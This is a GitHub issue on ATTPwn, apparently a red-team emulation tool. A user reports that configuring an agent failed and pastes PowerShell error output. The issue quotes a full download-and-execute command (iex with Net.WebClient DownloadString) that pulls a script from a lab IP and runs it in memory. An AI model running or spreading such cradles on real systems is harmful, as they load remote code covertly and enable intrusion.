ATTPwn icon indicating copy to clipboard operation
ATTPwn copied to clipboard

Warriors configuration Powershell error

Open backherozzo opened this issue 3 years ago • 0 comments

Hi, I'm trying to configure my first warrior but I received the following Powershell error, can you please help me?

PS C:\Windows\system32> powershell.exe -C "iex(new-object net.webclient).downloadstring('http://192.168.192.132:5000/consola');consola" Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server" At line:1 char:1

  • iex(new-object net.webclient).downloadstring('http://192.168.192.132: ...
  •   + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
      + FullyQualifiedErrorId : WebException
    
    

consola : The term 'consola' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:85

  • ... client).downloadstring('http://192.168.192.132:5000/consola');consola
  •                                                               ~~~~~~~
    
    • CategoryInfo : ObjectNotFound: (consola:String) [], CommandNotFoundException
    • FullyQualifiedErrorId : CommandNotFoundException

backherozzo avatar Feb 10 '21 13:02 backherozzo